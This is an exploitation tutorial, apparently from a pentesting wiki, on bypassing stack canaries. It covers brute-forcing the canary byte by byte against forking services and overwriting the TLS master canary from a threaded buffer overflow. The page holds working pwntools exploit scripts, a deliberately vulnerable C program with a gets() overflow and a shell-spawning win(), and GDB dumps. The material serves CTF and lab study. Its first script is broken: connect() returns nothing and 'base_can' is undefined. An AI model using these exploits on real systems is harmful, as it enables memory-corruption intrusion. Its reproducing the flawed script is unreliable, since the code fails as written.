Skip to content

BF Forked & Threaded Stack Canaries

[AD REMOVED]

If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.

[!NOTE] Note that checksec might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.

Brute force Canary

The best way to bypass a simple canary is if the binary is a program forking child processes every time you establish a new connection with it (network service), because every time you connect to it the same canary will be used.

Then, the best way to bypass the canary is just to brute-force it char by char, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function brute-forces an 8 Bytes canary (x64) and distinguish between a correct guessed byte and a bad byte just checking if a response is sent back by the server (another way in other situation could be using a try/except):

Example 1

This example is implemented for 64bits but could be easily implemented for 32 bits.

from pwn import *

def connect():
    r = remote("localhost", 8788)

def get_bf(base):
    canary = ""
    guess = 0x0
    base += canary

    while len(canary) < 8:
        while guess != 0xff:
            r = connect()

            r.recvuntil("Username: ")
            r.send(base + chr(guess))

            if "SOME OUTPUT" in r.clean():
                print "Guessed correct byte:", format(guess, '02x')
                canary += chr(guess)
                base += chr(guess)
                guess = 0x0
                r.close()
                break
            else:
                guess += 1
                r.close()

    print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
    return base

canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary

Example 2

This is implemented for 32 bits, but this could be easily changed to 64bits.\ Also note that for this example the program expected first a byte to indicate the size of the input and the payload.

from pwn import *

# Here is the function to brute force the canary
def breakCanary():
    known_canary = b""
    test_canary = 0x0
    len_bytes_to_read = 0x21

    for j in range(0, 4):
        # Iterate up to 0xff times to brute force all posible values for byte
        for test_canary in range(0xff):
            print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

            # Send the current input size
            target.send(len_bytes_to_read.to_bytes(1, "little"))

            # Send this iterations canary
            target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

            # Scan in the output, determine if we have a correct value
            output = target.recvuntil(b"exit.")
            if b"YUM" in output:
                # If we have a correct value, record the canary value, reset the canary value, and move on
                print(" - next byte is: " + hex(test_canary))
                known_canary = known_canary + test_canary.to_bytes(1, "little")
                len_bytes_to_read += 1
                break

    # Return the canary
    return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")

Threads

Threads of the same process will also share the same canary token, therefore it'll be possible to brute-force a canary if the binary spawns a new thread every time an attack happens.

A buffer overflow in a threaded function protected with canary can be used to modify the master canary of the process. As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).

Example

The following program is vulnerable to Buffer Overflow, but it is compiled with canary:

#include <pthread.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

// gcc thread_canary.c -no-pie -l pthread -o thread_canary

void win() {
    execve("/bin/sh", NULL, NULL);
}

void* vuln() {
    char data[0x20];
    gets(data);
}

int main() {
    pthread_t thread;

    pthread_create(&thread, NULL, vuln, NULL);
    pthread_join(thread, NULL);

    return 0;
}

Notice that vuln is called inside a thread. In GDB we can take a look at vuln, specifically, at the point where the program calls gets to read input data:

gef> break gets
Breakpoint 1 at 0x4010a0
gef> run
...
gef> x/10gx $rdi
0x7ffff7d7ee20: 0x0000000000000000      0x0000000000000000
0x7ffff7d7ee30: 0x0000000000000000      0x0000000000000000
0x7ffff7d7ee40: 0x0000000000000000      0x493fdc653a156800
0x7ffff7d7ee50: 0x0000000000000000      0x00007ffff7e17ac3
0x7ffff7d7ee60: 0x0000000000000000      0x00007ffff7d7f640

The above represents the address of data, where the program will write user input. The stack canary is found at 0x7ffff7d7ee48 (0x493fdc653a156800), and the return address is at 0x7ffff7d7ee50 (0x00007ffff7e17ac3):

gef> telescope $rdi 8 -n
0x7ffff7d7ee20|+0x0000|+000: 0x0000000000000000  <-  $rdi
0x7ffff7d7ee28|+0x0008|+001: 0x0000000000000000
0x7ffff7d7ee30|+0x0010|+002: 0x0000000000000000
0x7ffff7d7ee38|+0x0018|+003: 0x0000000000000000
0x7ffff7d7ee40|+0x0020|+004: 0x0000000000000000
0x7ffff7d7ee48|+0x0028|+005: 0x493fdc653a156800  <-  canary
0x7ffff7d7ee50|+0x0030|+006: 0x0000000000000000  <-  $rbp
0x7ffff7d7ee58|+0x0038|+007: 0x00007ffff7e17ac3 <start_thread+0x2f3>  ->  0xe8ff31fffffe6fe9  <-  retaddr[2]

Notice that the stack addresses do not belong to the actual stack:

gef> vmmap stack
[ Legend:  Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x00007ffff7580000 0x00007ffff7d83000 0x0000000000803000 0x0000000000000000 rw- <tls-th1><stack-th2>  <-  $rbx, $rsp, $rbp, $rsi, $rdi, $r12
0x00007ffffffde000 0x00007ffffffff000 0x0000000000021000 0x0000000000000000 rw- [stack]  <-  $r9, $r15

The thread's stack is placed above the Thread Local Storage (TLS), where the master canary is stored:

gef> tls
$tls = 0x7ffff7d7f640
...
---------------------------------------------------------------------------- TLS ----------------------------------------------------------------------------
0x7ffff7d7f640|+0x0000|+000: 0x00007ffff7d7f640  ->  [loop detected]  <-  $rbx, $r12
0x7ffff7d7f648|+0x0008|+001: 0x00000000004052b0  ->  0x0000000000000001
0x7ffff7d7f650|+0x0010|+002: 0x00007ffff7d7f640  ->  [loop detected]
0x7ffff7d7f658|+0x0018|+003: 0x0000000000000001
0x7ffff7d7f660|+0x0020|+004: 0x0000000000000000
0x7ffff7d7f668|+0x0028|+005: 0x493fdc653a156800  <-  canary
0x7ffff7d7f670|+0x0030|+006: 0xb79b79966e9916c4  <-  PTR_MANGLE cookie
0x7ffff7d7f678|+0x0038|+007: 0x0000000000000000
...

[!NOTE] Some of the above GDB functions are defined on an extension called bata24/gef, which has more features than the usual hugsy/gef.

As a result, a large Buffer Overflow can allow to modify both the stack canary and the master canary in the TLS. This is the offset:

gef> p/x 0x7ffff7d7f668 - $rdi
$1 = 0x848

This is a short exploit to call win:

from pwn import *

context.binary = 'thread_canary'

payload  = b'A' * 0x28                    # buffer overflow offset
payload += b'BBBBBBBB'                    # overwritting stack canary
payload += b'A' * 8                       # saved $rbp
payload += p64(context.binary.sym.win)    # return address
payload += b'A' * (0x848 - len(payload))  # padding
payload += b'BBBBBBBB'                    # overwritting master canary

io = context.binary.process()
io.sendline(payload)
io.interactive()

Other examples & references